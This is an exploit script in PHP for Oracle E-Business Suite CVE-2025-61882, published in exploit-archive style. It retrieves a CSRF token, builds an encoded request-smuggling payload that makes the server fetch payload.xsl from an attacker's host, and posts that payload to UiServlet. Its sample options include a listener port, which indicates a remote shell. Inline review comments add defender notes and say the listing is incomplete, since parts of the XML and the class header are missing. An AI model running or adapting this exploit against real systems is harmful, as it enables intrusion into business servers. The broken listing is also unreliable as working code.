============================================================================================================================================= | # Title : Oracle E-Business Suite 12.2.3 through 12.2.14 Corrected Request Smuggling Exploit with Enhanced CSRF Token Extraction | | # Author : indoushka | | # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 147.0.1 (64 bits) | | # Vendor : https://www.oracle.com/applications/ebusiness/ | ============================================================================================================================================= [+] References: https://packetstorm.news/files/id/214189/ & CVE-2025-61882 [+] Summary: This script is a refined proof-of-concept targeting Oracle E‑Business Suite (EBS) vulnerability CVE‑2025‑61882. It corrects logical flaws in request smuggling payload construction, particularly around request termination and CRLF preservation, ensuring reliable proxy/backend desynchronization. The exploit also improves CSRF token extraction by prioritizing response headers (modern EBS behavior) with a fallback to parsing the response body. Additional fixes harden URL parsing (scheme/host/port handling) to avoid runtime warnings while preserving the original structure. The result is a more stable, context-aware exploit workflow suitable for controlled security testing and research. [+] POC : php poc.php target = $options['target'] ?? null; $this->lhost = $options['lhost'] ?? null; $this->lport = $options['lport'] ?? null; $this->srvHost = $options['srvHost'] ?? '127.0.0.1'; $this->srvPort = $options['srvPort'] ?? 8080; $this->verbose = $options['verbose'] ?? false; if ($this->target) { $parsed = parse_url($this->target); if ($parsed !== false) { $scheme = $parsed['scheme'] ?? 'http'; $this->useHttps = ($scheme === 'https'); $this->target = $parsed['host'] ?? $this->target; $this->targetPort = $parsed['port'] ?? ($this->useHttps ? 
443 : 80);
            // NOTE(review): the class header, property declarations and the start of the
            // constructor are not part of this listing (they appear to have been lost in
            // extraction); only the constructor's last statement and closing braces are here.
        }
    }
}

    /**
     * Fetches an EBS CSRF token from /OA_HTML/JavaScriptServlet.
     *
     * The POST is made with $returnFull = true, so httpRequest() enables CURLOPT_HEADER and
     * $response contains the response headers as well as the body. The first pattern reads the
     * X-ORACLE-DBC-CSRF-TOKEN response header (the header text calls this the modern EBS
     * behaviour); the second falls back to a JSON "csrfToken" member in the body.
     *
     * Only the header-derived value is trimmed; the body-derived value is returned as matched.
     * httpRequest() can return false on a transport error and that value reaches preg_match()
     * unchecked (coerced to "" unless strict_types is declared in the missing file header).
     *
     * Defender note: this is the first of the two requests the script emits — a POST to
     * JavaScriptServlet carrying CSRF-XHR / FETCH-CSRF-TOKEN from a non-browser client.
     *
     * @param void
     * @return string|false the token, or false when neither pattern matches
     */
    private function retrieveCsrfTokenImproved()
    {
        $url = $this->buildUrl('/OA_HTML/JavaScriptServlet');
        $headers = [
            'CSRF-XHR: YES',
            'FETCH-CSRF-TOKEN: 1',
            'X-Requested-With: XMLHttpRequest'
        ];
        $response = $this->httpRequest('POST', $url, '', $headers, true);
        if (preg_match('/X-ORACLE-DBC-CSRF-TOKEN:\s*([a-zA-Z0-9\-]+)/i', $response, $m)) {
            return trim($m[1]);
        }
        if (preg_match('/"csrfToken"\s*:\s*"([^"]+)"/', $response, $m)) {
            return $m[1];
        }
        return false;
    }

    /**
     * Builds the text that exploit() embeds in the getUiType parameter.
     *
     * The text is a chunked-encoding terminator ("0\r\n\r\n") followed by a complete second
     * HTTP/1.1 GET for the .xsl resource named by $xslUrl; host and path are taken from
     * parse_url($xslUrl) with $this->srvHost and /payload.xsl as fallbacks (the port of
     * $xslUrl is not used here). The file header describes this as the request-termination /
     * CRLF-preservation part of a proxy-backend desynchronisation; whether an intermediary
     * actually parses it that way cannot be verified from this listing.
     *
     * Defender note: the inner request carries a fixed "User-Agent: Oracle-Internal/1.0"
     * header and a "Host:" pointing at the attacker-controlled server, both of which are
     * artefacts of this particular script; the vendor fix referenced in the file header
     * (CVE-2025-61882) is the mitigation for the underlying issue.
     *
     * @param string $xslUrl URL of the .xsl resource the smuggled request asks for
     * @return string the payload after encodeSmugglePayload()
     */
    private function createSmugglePayloadImproved($xslUrl)
    {
        $parsedXsl = parse_url($xslUrl);
        $xslHost = $parsedXsl['host'] ?? $this->srvHost;
        $xslPath = $parsedXsl['path'] ?? '/payload.xsl';
        $smuggled = "GET {$xslPath} HTTP/1.1\r\n";
        $smuggled .= "Host: {$xslHost}\r\n";
        $smuggled .= "User-Agent: Oracle-Internal/1.0\r\n";
        $smuggled .= "Connection: keep-alive\r\n\r\n";
        $payload = "0\r\n\r\n";
        $payload .= $smuggled;
        return $this->encodeSmugglePayload($payload);
    }

    /**
     * Rewrites $payload so that every byte except CR and LF becomes a decimal numeric
     * character reference ("&#NN;"); CR and LF are copied through unchanged.
     *
     * Works byte-wise (strlen/ord), so any multibyte input is encoded one byte at a time.
     * Presumably this is how the text is meant to survive XML parsing with its line breaks
     * intact (the header's "CRLF preservation") — TODO confirm against the consuming parser.
     *
     * Defender note: a form field whose value is a long run of "&#NN;" references with raw
     * line breaks between them is a distinctive shape for this request.
     *
     * @param string $payload raw bytes
     * @return string encoded text
     */
    private function encodeSmugglePayload($payload)
    {
        $encoded = '';
        $len = strlen($payload);
        for ($i = 0; $i < $len; $i++) {
            $c = $payload[$i];
            if ($c === "\r" || $c === "\n") {
                $encoded .= $c;
            } else {
                $encoded .= '&#' . ord($c) . ';';
            }
        }
        return $encoded;
    }

    /**
     * Runs the whole sequence: token fetch, payload build, one POST to
     * /OA_HTML/configurator/UiServlet.
     *
     * Points grounded in this listing:
     *  - when retrieveCsrfTokenImproved() returns false the script only warns and continues;
     *    http_build_query() renders that false as "0" for oa_csrf_token;
     *  - the string literals assigned to $xml below are empty or text-only — the markup that
     *    would normally surround {$smuggleData} looks stripped from this listing, so what this
     *    copy posts is not the document the file header describes; treat the listing as
     *    incomplete rather than as a working reference;
     *  - nothing on this page reads $this->lhost / $this->lport; the "listener" in the final
     *    message is external to the script.
     *
     * Defender note: the expected outcome the success message alludes to is an outbound fetch
     * of payload.xsl from the EBS tier to $this->srvHost — egress from the application tier to
     * an unexpected host, preceded by the two POSTs above, is what to look for.
     *
     * @return void
     */
    public function exploit()
    {
        $this->log("Attempting to retrieve CSRF token...", "info");
        $token = $this->retrieveCsrfTokenImproved();
        if (!$token) {
            $this->log("Failed to retrieve CSRF token, smuggling may be unreliable.", "warning");
        }
        $xslUrl = "http://{$this->srvHost}:{$this->srvPort}/payload.xsl";
        $smuggleData = $this->createSmugglePayloadImproved($xslUrl);
        $xml = "";
        $xml .= "";
        $xml .= "http://internal.ebs.local{$smuggleData}";
        $xml .= "Applet";
        $xml .= "";
        $url = $this->buildUrl('/OA_HTML/configurator/UiServlet');
        $postData = http_build_query([
            'redirectFromJsp' => '1',
            'getUiType' => $xml,
            'oa_csrf_token' => $token
        ]);
        $this->log("Sending smuggling payload to UiServlet...", "info");
        $this->httpRequest('POST', $url, $postData, [
            'Content-Type: application/x-www-form-urlencoded'
        ]);
        $this->log("Payload sent. Monitor your HTTP server and listener.", "success");
    }

    /**
     * Thin curl wrapper used by the methods above.
     *
     * CURLOPT_SSL_VERIFYPEER is set to false, i.e. the peer certificate is never validated,
     * so an HTTPS target is accepted with any certificate (and the connection is open to
     * interception). $this->userAgent is declared in the part of the class that is not on
     * this page. curl_close() has no effect on PHP 8.0+ but is harmless.
     *
     * @param string $method     HTTP method, applied via CURLOPT_CUSTOMREQUEST; 'POST' also sets CURLOPT_POSTFIELDS
     * @param string $url        absolute URL
     * @param string $data       request body, only sent for POST
     * @param array  $headers    extra request headers; the User-Agent line is always prepended
     * @param bool   $returnFull when true, CURLOPT_HEADER includes the response headers in the result
     * @return string|false raw response, or false when curl_exec() fails — callers on this page do not check
     */
    private function httpRequest($method, $url, $data = '', $headers = [], $returnFull = false)
    {
        $ch = curl_init($url);
        curl_setopt_array($ch, [
            CURLOPT_RETURNTRANSFER => true,
            CURLOPT_SSL_VERIFYPEER => false,
            CURLOPT_CUSTOMREQUEST => $method,
            CURLOPT_HEADER => $returnFull,
            CURLOPT_HTTPHEADER => array_merge(
                ["User-Agent: {$this->userAgent}"],
                $headers
            )
        ]);
        if ($method === 'POST') {
            curl_setopt($ch, CURLOPT_POSTFIELDS, $data);
        }
        $response = curl_exec($ch);
        curl_close($ch);
        return $response;
    }

    /**
     * Composes "scheme://host:port" + $path from the values the constructor derived with
     * parse_url(): $this->useHttps, $this->target (the host part) and $this->targetPort.
     *
     * @param string $path absolute path beginning with "/"
     * @return string
     */
    private function buildUrl($path)
    {
        $scheme = $this->useHttps ? 'https' : 'http';
        return "{$scheme}://{$this->target}:{$this->targetPort}{$path}";
    }

    /**
     * Writes "[type] message" to stdout.
     *
     * @param string $msg
     * @param string $type free-form tag (info / warning / success on this page)
     * @return void
     */
    private function log($msg, $type)
    {
        echo "[{$type}] {$msg}\n";
    }
}

// Script-level configuration. The addresses are the author's sample values (private ranges);
// 'lhost' / 'lport' are stored by the constructor but not read by any method on this page.
$options = [
    'target' => 'http://192.168.1.100:8000',
    'lhost' => '192.168.1.50',
    'lport' => 4444,
    'srvHost' => '192.168.1.50',
    'srvPort' => 8080
];
$exploit = new OracleEBSCVE202561882Exploit($options);
$exploit->exploit();
Greetings to :===================================================================================== jericho * Larry W.
Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)| ===================================================================================================